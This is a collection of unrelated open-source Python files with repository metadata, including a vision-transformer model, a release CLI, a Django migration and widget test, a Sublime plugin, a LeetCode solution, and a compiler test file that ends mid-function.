def extra_repr(self) -> str:
return "p={}".format(self.drop_prob)
class VanOverlappingPatchEmbedder(nn.Module):
"""
Downsamples the input using a patchify operation with a `stride` of 4 by default making adjacent windows overlap by
half of the area. From [PVTv2: Improved Baselines with Pyramid Vision
Transformer](https://arxiv.org/abs/2106.13797).
"""
def __init__(self, in_channels: int, hidden_size: int, patch_size: int = 7, stride: int = 4):
super().__init__()
self.convolution = nn.Conv2d(
in_channels, hidden_size, kernel_size=patch_size, stride=stride, padding=patch_size // 2
)
self.normalization = nn.BatchNorm2d(hidden_size)
def forward(self, input: torch.Tensor) -> torch.Tensor:
hidden_state = self.convolution(input)
hidden_state = self.normalization(hidden_state)
return hidden_state
class VanMlpLayer(nn.Module):
"""
MLP with depth-wise convolution, from [PVTv2: Improved Baselines with Pyramid Vision
Transformer](https://arxiv.org/abs/2106.13797).
"""
def __init__(
self,
in_channels: int,
hidden_size: int,
out_channels: int,
hidden_act: str = "gelu",
dropout_rate: float = 0.5,
):
super().__init__()
self.in_dense = nn.Conv2d(in_channels, hidden_size, kernel_size=1)
self.depth_wise = nn.Conv2d(hidden_size, hidden_size, kernel_size=3, padding=1, groups=hidden_size)
self.activation = ACT2FN[hidden_act]
self.dropout1 = nn.Dropout(dropout_rate)
self.out_dense = nn.Conv2d(hidden_size, out_channels, kernel_size=1)
self.dropout2 = nn.Dropout(dropout_rate)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
hidden_state = self.in_dense(hidden_state)
hidden_state = self.depth_wise(hidden_state)
hidden_state = self.activation(hidden_state)
hidden_state = self.dropout1(hidden_state)
hidden_state = self.out_dense(hidden_state)
hidden_state = self.dropout2(hidden_state)
return hidden_state
class VanLargeKernelAttention(nn.Module):
"""
Basic Large Kernel Attention (LKA).
"""
def __init__(self, hidden_size: int):
super().__init__()
self.depth_wise = nn.Conv2d(hidden_size, hidden_size, kernel_size=5, padding=2, groups=hidden_size)
self.depth_wise_dilated = nn.Conv2d(
hidden_size, hidden_size, kernel_size=7, dilation=3, padding=9, groups=hidden_size
)
self.point_wise = nn.Conv2d(hidden_size, hidden_size, kernel_size=1)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
hidden_state = self.depth_wise(hidden_state)
hidden_state = self.depth_wise_dilated(hidden_state)
hidden_state = self.point_wise(hidden_state)
return hidden_state
class VanLargeKernelAttentionLayer(nn.Module):
"""
Computes attention using Large Kernel Attention (LKA) and attends the input.
"""
def __init__(self, hidden_size: int):
super().__init__()
self.attention = VanLargeKernelAttention(hidden_size)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
attention = self.attention(hidden_state)
attended = hidden_state * attention
return attended
class VanSpatialAttentionLayer(nn.Module):
"""
Van spatial attention layer composed by projection (via conv) -> act -> Large Kernel Attention (LKA) attention ->
projection (via conv) + residual connection.
"""
def __init__(self, hidden_size: int, hidden_act: str = "gelu"):
super().__init__()
self.pre_projection = nn.Sequential(
OrderedDict(
[
("conv", nn.Conv2d(hidden_size, hidden_size, kernel_size=1)),
("act", ACT2FN[hidden_act]),
]
)
)
self.attention_layer = VanLargeKernelAttentionLayer(hidden_size)
self.post_projection = nn.Conv2d(hidden_size, hidden_size, kernel_size=1)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
residual = hidden_state
hidden_state = self.pre_projection(hidden_state)
hidden_state = self.attention_layer(hidden_state)
hidden_state = self.post_projection(hidden_state)
hidden_state = hidden_state + residual
return hidden_state
class VanLayerScaling(nn.Module):
"""
Scales the inputs by a learnable parameter initialized by `initial_value`.
"""
def __init__(self, hidden_size: int, initial_value: float = 1e-2):
super().__init__()
self.weight = nn.Parameter(initial_value * torch.ones((hidden_size)), requires_grad=True)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
# unsqueezing for broadcasting
hidden_state = self.weight.unsqueeze(-1).unsqueeze(-1) * hidden_state
return hidden_state
class VanLayer(nn.Module):
"""
Van layer composed by normalization layers, large kernel attention (LKA) and a multi layer perceptron (MLP).
"""
def __init__(
self,
config: VanConfig,
hidden_size: int,
mlp_ratio: int = 4,
drop_path_rate: float = 0.5,
):
super().__init__()
self.drop_path = VanDropPath(drop_path_rate) if drop_path_rate > 0.0 else nn.Identity()
self.pre_normomalization = nn.BatchNorm2d(hidden_size)
self.attention = VanSpatialAttentionLayer(hidden_size, config.hidden_act)
self.attention_scaling = VanLayerScaling(hidden_size, config.layer_scale_init_value)
self.post_normalization = nn.BatchNorm2d(hidden_size)
self.mlp = VanMlpLayer(
hidden_size, hidden_size * mlp_ratio, hidden_size, config.hidden_act, config.dropout_rate
)
self.mlp_scaling = VanLayerScaling(hidden_size, config.layer_scale_init_value)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
residual = hidden_state
# attention
hidden_state = self.pre_normomalization(hidden_state)
hidden_state = self.attention(hidden_state)
hidden_state = self.attention_scaling(hidden_state)
hidden_state = self.drop_path(hidden_state)
# residual connection
hidden_state = residual + hidden_state
residual = hidden_state
# mlp
hidden_state = self.post_normalization(hidden_state)
hidden_state = self.mlp(hidden_state)
hidden_state = self.mlp_scaling(hidden_state)
hidden_state = self.drop_path(hidden_state)
# residual connection
hidden_state = residual + hidden_state
return hidden_state
class VanStage(nn.Module):
"""
VanStage, consisting of multiple layers.
"""
def __init__(
self,
config: VanConfig,
in_channels: int,
hidden_size: int,
patch_size: int,
stride: int,
depth: int,
mlp_ratio: int = 4,
drop_path_rate: float = 0.0,
):
super().__init__()
self.embeddings = VanOverlappingPatchEmbedder(in_channels, hidden_size, patch_size, stride)
self.layers = nn.Sequential(
*[
VanLayer(
config,
hidden_size,
mlp_ratio=mlp_ratio,
drop_path_rate=drop_path_rate,
)
for _ in range(depth)
]
)
self.normalization = nn.LayerNorm(hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_state: torch.Tensor) -> torch.Tensor:
hidden_state = self.embeddings(hidden_state)
hidden_state = self.layers(hidden_state)
# rearrange b c h w -> b (h w) c
batch_size, hidden_size, height, width = hidden_state.shape
hidden_state = hidden_state.flatten(2).transpose(1, 2)
hidden_state = self.normalization(hidden_state)
# rearrange b (h w) c- > b c h w
hidden_state = hidden_state.view(batch_size, height, width, hidden_size).permute(0, 3, 1, 2)
return hidden_state
class VanEncoder(nn.Module):
"""
VanEncoder, consisting of multiple stages.
"""
def __init__(self, config: VanConfig):
super().__init__()
self.stages = nn.ModuleList([])
patch_sizes = config.patch_sizes
strides = config.strides
hidden_sizes = config.hidden_sizes
depths = config.depths
mlp_ratios = config.mlp_ratios
drop_path_rates = [x.item() for x in torch.linspace(0, config.drop_path_rate, sum(config.depths))]
for num_stage, (patch_size, stride, hidden_size, depth, mlp_expantion, drop_path_rate) in enumerate(
zip(patch_sizes, strides, hidden_sizes, depths, mlp_ratios, drop_path_rates)
):
is_first_stage = num_stage == 0
in_channels = hidden_sizes[num_stage - 1]
if is_first_stage:
in_channels = config.num_channels
self.stages.append(
VanStage(
config,
in_channels,
hidden_size,
patch_size=patch_size,
stride=stride,
depth=depth,
mlp_ratio=mlp_expantion,
drop_path_rate=drop_path_rate,
)
)
def forward(
self,
hidden_state: torch.Tensor,
output_hidden_states: Optional[bool] = False,
return_dict: Optional[bool] = True,
) -> Union[Tuple, BaseModelOutputWithNoAttention]:
all_hidden_states = () if output_hidden_states else None
for _, stage_module in enumerate(self.stages):
hidden_state = stage_module(hidden_state)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_state,)
if not return_dict:
return tuple(v for v in [hidden_state, all_hidden_states] if v is not None)
return BaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=all_hidden_states)
class VanPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = VanConfig
base_model_prefix = "van"
main_input_name = "pixel_values"
supports_gradient_checkpointing = True
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, nn.Linear):
nn.init.trunc_normal_(module.weight, std=self.config.initializer_range)
if isinstance(module, nn.Linear) and module.bias is not None:
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.LayerNorm):
nn.init.constant_(module.bias, 0)
nn.init.constant_(module.weight, 1.0)
elif isinstance(module, nn.Conv2d):
fan_out = module.kernel_size[0] * module.kernel_size[1] * module.out_channels
fan_out //= module.groups
module.weight.data.normal_(0, math.sqrt(2.0 / fan_out))
if module.bias is not None:
module.bias.data.zero_()
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, VanModel):
module.gradient_checkpointing = value
VAN_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`VanConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
VAN_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`ConvNextImageProcessor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all stages. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare VAN model outputting raw features without any specific head on top. Note, VAN does not have an embedding"
" layer.",
VAN_START_DOCSTRING,
)
class VanModel(VanPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
self.encoder = VanEncoder(config)
# final layernorm layer
self.layernorm = nn.LayerNorm(config.hidden_sizes[-1], eps=config.layer_norm_eps)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(VAN_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPoolingAndNoAttention,
config_class=_CONFIG_FOR_DOC,
modality="vision",
expected_output=_EXPECTED_OUTPUT_SHAPE,
)
def forward(
self,
pixel_values: Optional[torch.FloatTensor],
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, BaseModelOutputWithPoolingAndNoAttention]:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
encoder_outputs = self.encoder(
pixel_values,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
last_hidden_state = encoder_outputs[0]
# global average pooling, n c w h -> n c
pooled_output = last_hidden_state.mean(dim=[-2, -1])
if not return_dict:
return (last_hidden_state, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=last_hidden_state,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
)
@add_start_docstrings(
"""
VAN Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
ImageNet.
""",
VAN_START_DOCSTRING,
)
class VanForImageClassification(VanPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.van = VanModel(config)
# Classifier head
self.classifier = (
nn.Linear(config.hidden_sizes[-1], config.num_labels) if config.num_labels > 0 else nn.Identity()
)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(VAN_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_IMAGE_CLASS_CHECKPOINT,
output_type=ImageClassifierOutputWithNoAttention,
config_class=_CONFIG_FOR_DOC,
expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, ImageClassifierOutputWithNoAttention]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.van(pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict)
pooled_output = outputs.pooler_output if return_dict else outputs[1]
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.config.num_labels == 1:
self.config.problem_type = "regression"
elif self.config.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.config.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.config.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return ImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
|
de183954421ea126c5702d50e0fefa9e54e6bdc7
|
5105403f2b75990654519438d8ceabcf80962ebf
|
/release/__main__.py
|
3546093f59fbc956d4a730773670d52df6775513
|
[
"BSD-3-Clause"
] |
permissive
|
bokeh/bokeh
|
ed1d81eb07d27d27c6710c9fec9114886047f528
|
310cb2cbeabc4c4b8180cbda566df16039737cdc
|
refs/heads/branch-3.3
| 2023-08-31T23:53:06.537061
| 2023-08-30T03:43:05
| 2023-08-30T03:43:05
| 3,834,332
| 17,174
| 5,251
|
BSD-3-Clause
| 2023-09-14T11:37:23
| 2012-03-26T15:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 1,901
|
py
|
__main__.py
|
# -----------------------------------------------------------------------------
# Copyright (c) 2012 - 2023, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import annotations
# Standard library imports
import sys
# Bokeh imports
from . import stages
from .config import Config
from .pipeline import Pipeline
from .system import System
from .util import load_config, save_config
system = System()
stage_generators = {
"generate-build-checks": stages.BUILD_CHECKS,
"generate-build-steps": stages.BUILD_STEPS,
"generate-deploy-checks": stages.DEPLOY_CHECKS,
"generate-deploy-steps": stages.DEPLOY_STEPS,
}
if len(sys.argv) == 3 and sys.argv[1] == "generate-config":
config = Config(sys.argv[2])
save_config(config)
sys.exit(0)
if len(sys.argv) == 2 and sys.argv[1] in stage_generators:
print([func.__name__ for func in stage_generators[sys.argv[1]]])
sys.exit(0)
if len(sys.argv) == 2 and sys.argv[1] in dir(stages):
config = load_config()
func = getattr(stages, sys.argv[1])
pipe = Pipeline([func], config, system)
pipe.execute()
save_config(config)
sys.exit(0)
if len(sys.argv) == 3 and sys.argv[1] == "build":
config = Config(sys.argv[2])
check = Pipeline(stages.BUILD_CHECKS, config, system)
check.execute()
steps = Pipeline(stages.BUILD_STEPS, config, system)
steps.execute()
sys.exit(0)
if len(sys.argv) == 3 and sys.argv[1] == "deploy":
config = Config(sys.argv[2])
check = Pipeline(stages.DEPLOY_CHECKS, config, system)
check.execute()
steps = Pipeline(stages.DEPLOY_STEPS, config, system)
steps.execute()
sys.exit(0)
raise RuntimeError(f"Unrecognized args: {sys.argv[1:]}")
|
2f57c530289bc46d8413e7e267875b4ece65c5c6
|
6564f42640e11689c2ddb6b92325afe6fddc6a6f
|
/cumulusci/tasks/preflight/recordtypes.py
|
e56e3d9ae97e15367cdd6cb2a506b13f40769110
|
[
"LicenseRef-scancode-free-unknown"
] |
permissive
|
SFDO-Tooling/CumulusCI
|
32d4509fa8a36905cfc84fd6283403fd7f4b78c4
|
9ccf3c9566f78c6e9102ac214db30470cef660c1
|
refs/heads/main
| 2023-08-18T04:53:55.733027
| 2023-08-11T20:52:08
| 2023-08-11T20:52:08
| 15,592,459
| 226
| 134
|
BSD-3-Clause
| 2023-09-14T05:09:26
| 2014-01-02T20:01:31
|
Python
|
UTF-8
|
Python
| false
| false
| 542
|
py
|
recordtypes.py
|
from collections import defaultdict
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
class CheckSObjectRecordTypes(BaseSalesforceApiTask):
def _run_task(self):
rts = defaultdict(list)
records = self.tooling.query_all(
"Select SobjectType, FullName FROM RecordType"
)["records"]
for r in records:
rts[r["SobjectType"]].append(r["FullName"].split(".")[1])
self.return_values = rts
self.logger.info(f"Found existing Record Types: {self.return_values}")
|
b07c4a80f16f49af50bb4711fc10822145f55807
|
baa2c6f22ff563d417e34692bf3345077eb8fa5f
|
/docs/sphinxext/magics.py
|
d96b41c6e1736f86ee6467ddc2c257982437d1ac
|
[
"BSD-3-Clause"
] |
permissive
|
ipython/ipython
|
c42ea223b6e391bb7dd39888cb959d4d5d6b21a1
|
e5103f971233fd66b558585cce7a4f52a716cd56
|
refs/heads/main
| 2023-08-30T18:27:18.436521
| 2023-08-29T12:16:00
| 2023-08-29T12:16:00
| 658,518
| 13,673
| 4,729
|
BSD-3-Clause
| 2023-09-12T20:22:09
| 2010-05-10T04:46:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,496
|
py
|
magics.py
|
import re
from sphinx import addnodes
from sphinx.domains.std import StandardDomain
from sphinx.roles import XRefRole
name_re = re.compile(r"[\w_]+")
def parse_magic(env, sig, signode):
m = name_re.match(sig)
if not m:
raise Exception("Invalid magic command: %s" % sig)
name = "%" + sig
signode += addnodes.desc_name(name, name)
return m.group(0)
class LineMagicRole(XRefRole):
"""Cross reference role displayed with a % prefix"""
prefix = "%"
def process_link(self, env, refnode, has_explicit_title, title, target):
if not has_explicit_title:
title = self.prefix + title.lstrip("%")
target = target.lstrip("%")
return title, target
def parse_cell_magic(env, sig, signode):
m = name_re.match(sig)
if not m:
raise ValueError("Invalid cell magic: %s" % sig)
name = "%%" + sig
signode += addnodes.desc_name(name, name)
return m.group(0)
class CellMagicRole(LineMagicRole):
"""Cross reference role displayed with a %% prefix"""
prefix = "%%"
def setup(app):
app.add_object_type('magic', 'magic', 'pair: %s; magic command', parse_magic)
app.add_role_to_domain('std', 'magic', LineMagicRole(), override=True)
app.add_object_type('cellmagic', 'cellmagic', 'pair: %s; cell magic', parse_cell_magic)
app.add_role_to_domain('std', 'cellmagic', CellMagicRole(), override=True)
metadata = {'parallel_read_safe': True, 'parallel_write_safe': True}
return metadata
|
07b5c2d4dbacacdb588b05c0ae29d121906e5be0
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/migrations/0050_workflow_rejected_to_needs_changes.py
|
e9ed8f54e5c836c86b79ec3201102d6edb00df93
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
0050_workflow_rejected_to_needs_changes.py
|
# Generated by Django 3.0.5 on 2020-05-20 10:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("wagtailcore", "0049_taskstate_finished_by"),
]
operations = [
migrations.RemoveConstraint(
model_name="workflowstate",
name="unique_in_progress_workflow",
),
migrations.AlterField(
model_name="workflowstate",
name="status",
field=models.CharField(
choices=[
("in_progress", "In progress"),
("approved", "Approved"),
("needs_changes", "Needs changes"),
("cancelled", "Cancelled"),
],
default="in_progress",
max_length=50,
verbose_name="status",
),
),
migrations.AddConstraint(
model_name="workflowstate",
constraint=models.UniqueConstraint(
condition=models.Q(status__in=("in_progress", "needs_changes")),
fields=("page",),
name="unique_in_progress_workflow",
),
),
]
|
7b8324e1e736592959894a25605a68c139373a0f
|
26e3d85a3b61219e13f794289ff2b70baa248f14
|
/tests/test_widget_selectdate.py
|
44e328632c81b71fd2d90b384c35ce2d3e88a5cb
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
viewflow/django-material
|
ac8dd10daa8352440845c767b07cafc7f7d09216
|
31b1ce5f6fecc10ba4c9babe4219fb7be97dbf93
|
refs/heads/master
| 2023-08-15T23:32:58.330321
| 2023-04-12T06:12:07
| 2023-04-12T06:12:40
| 29,337,344
| 2,818
| 570
|
BSD-3-Clause
| 2023-03-04T02:28:50
| 2015-01-16T07:17:33
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,766
|
py
|
test_widget_selectdate.py
|
import json
from django import forms
from django.test.utils import override_settings
from django_webtest import WebTest
from . import build_test_urls
try:
from django.forms.widgets import SelectDateWidget
except ImportError:
# django 1.8
from django.forms.extras import SelectDateWidget
class SelectForm(forms.Form):
test_field = forms.DateField(
widget=SelectDateWidget)
data_field = forms.BooleanField(required=False, widget=forms.HiddenInput, initial=True,
help_text='To produce non empty POST for empty test_field')
@override_settings(ROOT_URLCONF=__name__)
class Test(WebTest):
default_form = SelectForm
def test_default_usecase(self):
page = self.app.get(self.test_default_usecase.url)
self.assertIn('id="id_test_field_container"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field_year"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field_month"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field_day"', page.body.decode('utf-8'))
# self.assertIn('data-test="Test Attr"', page.body.decode('utf-8'))
form = page.form
self.assertIn('test_field_year', form.fields)
self.assertIn('test_field_month', form.fields)
self.assertIn('test_field_day', form.fields)
form['test_field_year'] = '2023'
form['test_field_month'] = '1'
form['test_field_day'] = '13'
response = json.loads(form.submit().body.decode('utf-8'))
self.assertIn('cleaned_data', response)
self.assertIn('test_field', response['cleaned_data'])
self.assertEqual('2023-01-13', response['cleaned_data']['test_field'])
urlpatterns = build_test_urls(Test)
|
31b970c064d6b1472956b054962f1db4f2749200
|
f9357dc6ebe6ae1af0b03a9afc5f765706b8d31f
|
/sublime去除注释.py
|
8d2867eeb3b56ab84aabaaaadca33675f54ab85f
|
[] |
no_license
|
cilame/any-whim
|
660acd966048655aa36886047fbc232539807881
|
1520accbe1506a133989a6c2be17572e7fb4693e
|
refs/heads/master
| 2023-08-17T05:10:56.348200
| 2023-08-13T16:45:11
| 2023-08-13T16:45:11
| 110,548,292
| 125
| 64
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 571
|
py
|
sublime去除注释.py
|
# 将下面的 Python 代码保存到 Packages/User 目录下
# (可以通过点击 Preferences -> Browse Packages 进入 Packages 目录,然后再进入 User 目录)
# 并命名为 remove_comments.py。
# 使用时用 Ctrl+` 打开控制台,然后输入下面一行命令即可
# view.run_command('remove_comments')
import sublime_plugin
class RemoveCommentsCommand(sublime_plugin.TextCommand):
def run(self, edit):
comments = self.view.find_by_selector('comment')
for region in reversed(comments):
self.view.erase(edit, region)
|
8f2feace28e2d0403b738832787a5341d5a4fbff
|
15f0514701a78e12750f68ba09d68095172493ee
|
/Python3/223.py
|
71bc312c642851238195082f2acfb8bc37146d83
|
[
"MIT"
] |
permissive
|
strengthen/LeetCode
|
5e38c8c9d3e8f27109b9124ae17ef8a4139a1518
|
3ffa6dcbeb787a6128641402081a4ff70093bb61
|
refs/heads/master
| 2022-12-04T21:35:17.872212
| 2022-11-30T06:23:24
| 2022-11-30T06:23:24
| 155,958,163
| 936
| 365
|
MIT
| 2021-11-15T04:02:45
| 2018-11-03T06:47:38
| null |
UTF-8
|
Python
| false
| false
| 1,564
|
py
|
223.py
|
__________________________________________________________________________________________________
sample 40 ms submission
class Solution:
def computeArea(self, A: int, B: int, C: int, D: int, E: int, F: int, G: int, H: int) -> int:
area = (C-A)*(D-B) + (G-E)*(H-F)
Ai = Bi = Ci = Di = float('inf')
if A <= E <= C:
Ai, Ci = E, min(C, G)
elif E <= A <= G:
Ai, Ci = A, min(C, G)
if B <= F <= D:
Bi, Di = F, min(D, H)
elif F <= B <= H:
Bi, Di = B, min(D, H)
# print(area, Ai, Bi, Ci, Di)
if Ai != float('inf') and Bi != float('inf'):
return area-(Ci-Ai)*(Di-Bi)
return area
__________________________________________________________________________________________________
sample 13000 kb submission
class Solution:
def computeArea(self, A: int, B: int, C: int, D: int, E: int, F: int, G: int, H: int) -> int:
area1 = (D-B)*(C-A)
area2 = (H-F)*(G-E)
area_both = area1+area2
# now for intersection
top = min(D,H)
bottom = max(B,F)
left = max(A,E)
right = min(C,G)
height = top-bottom
width = right - left
if height >0 and width >0:
intersection_area = height*width
else:
intersection_area = 0
return area_both - intersection_area
__________________________________________________________________________________________________
|
a9c7f67fad4c4d48c3a005b2889e62e8d6d48db7
|
39164ede111f154b31cbb61663ea837f16f8aa4f
|
/odps/df/expr/tests/test_core.py
|
99156f55846b075c6e339e700f0bf746a082851f
|
[
"Apache-2.0"
] |
permissive
|
aliyun/aliyun-odps-python-sdk
|
217631252e6d52e75354a2a19faab5b9ff40e272
|
c5b897f03759b1a9851505eea3858a96d628f105
|
refs/heads/master
| 2023-08-16T22:42:12.441717
| 2023-07-19T06:28:25
| 2023-07-19T06:28:25
| 45,234,875
| 437
| 116
|
Apache-2.0
| 2023-08-03T06:45:34
| 2015-10-30T07:07:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,751
|
py
|
test_core.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2022 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..core import Node
class FakeNode(Node):
__slots__ = 'name',
_args = 'child1', 'child2', 'child3'
_cache_attrs = 'name',
def __str__(self):
return self.name
def test_nodes():
node1 = FakeNode(name='1')
node2 = FakeNode(name='2')
node3 = FakeNode(node1, name='3')
node4 = FakeNode(node3, node2, name='4')
node5 = FakeNode(node1, node4, name='5')
assert list(node5.traverse()) == [node1, node1, node3, node2, node4, node5]
assert list(node5.traverse(top_down=True)) == [node5, node1, node4, node3, node1, node2]
assert list(node5.traverse(unique=True)) == [node1, node3, node2, node4, node5]
assert list(node5.traverse(top_down=True, unique=True)) == [node5, node1, node4, node3, node2]
assert list(node5.leaves()) == [node1, node2]
node6 = FakeNode(node5, node3, name='6')
assert list(node6.traverse()) == [node1, node1, node3, node2, node4, node5, node3, node6]
assert list(node6.traverse(unique=True)) == [node1, node3, node2, node4, node5, node6]
node1_copy = FakeNode(name='1')
assert node1 == node1_copy
assert hash(node1) == hash(node1_copy)
node3_copy = FakeNode(node1_copy, name='3')
assert node3 == node3_copy
assert hash(node3) == hash(node3_copy)
assert node5.is_ancestor(node1) is True
assert node5.is_ancestor(node2) is True
assert node1.is_ancestor(node2) is False
assert [n.name for n in node5.path(node1)] == ['5', '1']
assert [n.name for n in node5.path(node2)] == ['5', '4', '2']
paths_node_5_1 = list(node5.all_path(node1))
assert len(paths_node_5_1) == 2
assert [int(n.name) for n in paths_node_5_1[0]] == [5, 1]
assert [int(n.name) for n in paths_node_5_1[1]] == [5, 4, 3, 1]
node6 = FakeNode(name='6')
node3.substitute(node1, node6)
assert list(node5.traverse()) == [node1, node6, node3, node2, node4, node5]
all_nodes = list(node5.traverse())
copy_nodes = list(node5.copy_tree().traverse())
assert len(all_nodes) == len(copy_nodes)
assert all(l is not r for l, r in zip(all_nodes, copy_nodes)) is True
|
9c1dfad5067f0da770c2592dff62ac60bef66444
|
e8b38b8dfa348ff006eb197a7906ca8e491a23dc
|
/tests/epyccel/test_epyccel_modules.py
|
963219e6d49ab023626ec0f047499c4e075c78b5
|
[
"MIT"
] |
permissive
|
pyccel/pyccel
|
d79a81dbdff1172839a6a1227abfcc1f97e6c97b
|
1896b761ba662c90b14c195bbb6eb5cddc57cbfc
|
refs/heads/devel
| 2023-08-30T12:15:25.244401
| 2023-08-28T09:31:32
| 2023-08-28T09:31:32
| 100,463,736
| 307
| 39
|
MIT
| 2023-09-14T19:29:26
| 2017-08-16T07:59:14
|
Python
|
UTF-8
|
Python
| false
| false
| 4,652
|
py
|
test_epyccel_modules.py
|
# pylint: disable=missing-function-docstring, missing-module-docstring
import numpy as np
from pyccel.epyccel import epyccel
RTOL = 2e-14
ATOL = 1e-15
def test_module_1(language):
import modules.Module_1 as mod
modnew = epyccel(mod, language=language)
from numpy import zeros
# ...
x_expected = zeros(5)
x = zeros(5)
mod.f(x_expected)
mod.g(x_expected)
modnew.f(x)
modnew.g(x)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
# ...
def test_local_module_1(language):
import Module_1 as mod
modnew = epyccel(mod, language=language)
from numpy import zeros
# ...
x_expected = zeros(5)
x = zeros(5)
mod.f(x_expected)
mod.g(x_expected)
modnew.f(x)
modnew.g(x)
assert np.allclose( x, x_expected, rtol=RTOL, atol=ATOL )
# ...
def test_module_2(language):
import modules.Module_2 as mod
modnew = epyccel(mod, language=language)
# ...
m1 = 2 ; m2 = 3
x = np.zeros((m1,m2))
modnew.f6(m1, m2, x)
x_expected = np.zeros((m1,m2))
mod.f6(m1, m2, x_expected)
